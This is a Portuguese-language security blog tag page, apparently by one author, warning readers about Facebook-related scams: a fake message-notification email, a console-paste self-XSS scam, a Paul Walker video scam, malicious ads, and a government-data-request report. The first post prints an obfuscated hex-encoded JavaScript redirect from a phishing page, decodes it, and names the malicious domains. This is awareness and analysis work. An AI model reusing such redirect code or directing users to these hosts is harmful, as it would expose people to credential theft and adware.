Todos os posts tagados facebook

Falsa notificação do Facebook leva a malware

por David Sopas em 6 de Maio de 2014 em Alerta FB, Artigos com 0 comentários Tweet
Falsa notificação do Facebook leva a malware

Email que clona uma notificação do Facebook de novas mensagens encaminha para um site malicioso.

Assunto do email:

[Username], you have pending messages

Se a vítima clicar num dos dois botões que acompanham o email, este vai para o site:

ip_malicioso/~up1adstop/coldness.php

O código-fonte deste site (ofuscado):

bch1=”\x30″;yva2=”\x68\x74\x74\x70\x3A\x2F\x2F\x74\x61\x62\x6C\x65\x74\x6D\x65\x64
\x69\x63\x61\x72\x65\x73\x2E\x65\x75″;
setTimeout(“\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F
\x6E\x2E\x68\x72\x65\x66\x3D\x79\x76
\x61\x32\x3B”,bch1);

… que depois de traduzido reencaminha para outro site malicioso:

setTimeout(“window.top.location.href=http://tabletmedicares.eu”, 0);

De referir que o primeiro url é detectado pelos antivirus online com uma taxa de 7/51 e que o alojamento web deste url é utilizado por diversos sites de phishing.

No segundo url, encontrei dois tipos de malware. Um que rouba a password do Facebook, instalando um plugin no browser, e outro que instala adware no sistema operativo.
Em ambos os casos, os antivirus mais comuns detectam e bloqueiam estes conteúdos maliciosos.

Se por acaso clicou num destes endereços, deverá verificar a presença de malware no seu sistema.

Esquema fraudulento promete roubar senha do Facebook

por David Sopas em 8 de Fevereiro de 2014 em Alerta FB com 0 comentários Tweet
hack_conta_facebook

Hoje está a circular em larga escala no Facebook um esquema fraudulento que informa aos utilizadores desta rede social que é possível roubar a contra-senha de qualquer utilizador do Facebook.

A página web - golelite.com/2014/02/revelador-de-contrasenas-facebook.html - promete hackar qualquer conta do Facebook apenas sabendo o perfil. De seguida, informa o utilizador que tem de executar 6 passos. Entre eles, cito:

1º Copia um determinado código
2º Ir para o perfil do Facebook que quer roubar
3º Entrar no Inspector do Google e pressionar F12
4º Colocar na secção da consola do Chrome
5º Colar o código que copiou no passo 1º
6º Pressionar Enter

hack_facebook_3

Basicamente, informa ao utilizador para colocar código Javascript num editor e executa esse mesmo código.
Neste caso, ao invés de roubar senha de qualquer utilizador do Facebook, este vai percorrer a lista de amigos da conta pessoal e identificá-los num comentário de um post para este esquema. Esta operação torna o post viral (à data deste artigo, o post do Facebook deste esquema já tinha mais de 130.000 comentários).

hack_conta_facebook2

O código malicioso está escrito em Javascript, e está ofuscado, embora tenha encontrado no Pastebin uma versão que pode ser lida de maneira a poder entender um pouco o que faz.

A falha não está propriamente no Facebook mas sim na mentalidade do utilizador que, por falta de atenção/informação, executa o próprio comando que o infecta.

Embora tenha sido escrito e propagado apenas em língua espanhola, são muitos os portugueses que estão a cair nesta fraude.

É importante divulgar esta informação para que o número de vítimas não aumente.

Vídeo do acidente do Paul Walker - Scam

por David Sopas em 9 de Dezembro de 2013 em Alerta FB, Artigos com 0 comentários Tweet
facebook_scam_paul_walker

Ainda no rescaldo da morte do actor Paul Walker (conhecido pelo pela no filme Fast & Furious), anda a circular pelo Facebook esquemas fraudulentos sobre este tema.

O título do post é [SHOCKING VIDEO] Watch Paul Walker Horrific Car Crash Caught On Camera!!!!!!!

Já encontrei duas situações deste esquema:

1ª O link da fraude não aponta para nenhum vídeo de qualquer acidente automóvel mas para uma página com instruções para instalar uma aplicação de Facebook maliciosa. Esta mesma aplicação coloca posteriormente a mensagem/link no timeline das vítimas.

2ª O link aponta para um site que pede para instalar uma extensão de browser maliciosa. Posteriormente irão surgir questionários no ecrã da vítima. O preenchimento do mesmo fornece quantias financeiras para o scammer e, caso o telefone seja preenchido, a vítima assina automaticamente serviços pagos de SMS.

Recomendo sempre um background-check destas aplicações e desconfiem sempre de sites pouco crediveis.

Relatório global do Facebook sobre pedidos governamentais

por David Sopas em 29 de Agosto de 2013 em Artigos com 0 comentários Tweet
Relatório global do Facebook sobre pedidos governamentais

O Facebook publicou o relatório dos pedidos que recebeu para informações de utilizadores por parte dos governos.
Neste relatório consta que o governo de Portugal obteve cerca de 42% dos dados que requisitou (Número total de pedido: 177 Pedidos de informação sobre utilizadores/contas: 213).

Esses pedidos incluem:

Os governos pedem ao Facebook e a muitas outras empresas informação sobre contas no âmbito de investigações oficiais. A grande maioria destes pedidos está relacionada com casos criminais, como roubo ou rapto. Em muitos destes casos, estes pedidos governamentais pretendem obter informação básica sobre subscritores, como o nome, a morada e a duração do serviço. Outros pedidos também podem visar os registos de endereços de IP ou até mesmo o conteúdo de contas. Implementámos normas rigorosas para lidar com todos os pedidos de dados por parte dos governos: https://www.facebook.com/safety/groups/law/guidelines/

No top 5 dos países com maior número de pedidos estão:

  1. Estados Unidos (11.000 a 12.000)
  2. India (3.245)
  3. Reino Unido (1.975)
  4. Alemanha (1.886)
  5. Itália (1.705)

Malware em anúncios do Facebook

por David Sopas em 13 de Agosto de 2013 em Alerta FB com 0 comentários Tweet
Malware em anúncios do Facebook

Alguns anúncios pagos no Facebook estão a propagar malware perante os utilizadores que clicam no mesmo.

Os temas são bastante variados mas salientam-se os anúncios de:

  • Produtos para aumentar desempenho desportivo
  • Redes sociais para adultos
  • Jogos sociais

Pelo que tenho conhecimento, o Facebook na altura da moderação do anúncio verifica automaticamente (ou manualmente) pela veracidade e reputação do site. Claro que após validação do anúncio, muito provavelmente, o malware não é detetado pelo Facebook. Utilizando técnicas mais avançadas de ofuscar código, também é possível esconder e passar por alguns filtros desta rede social e dos antivirus.
Um dos ataques que obtive acesso aproveitava-se de uma falha XSS de um site bastante popular para dar maior credibilidade. O vector XSS inseria um formulário HTML com a informação a ser enviada para um site russo ao invés do site original.

Fica aqui o alerta para não clicarem em anúncios duvidosos e manter sempre o vosso software atualizado.

← Mais antigos
Mais recentes →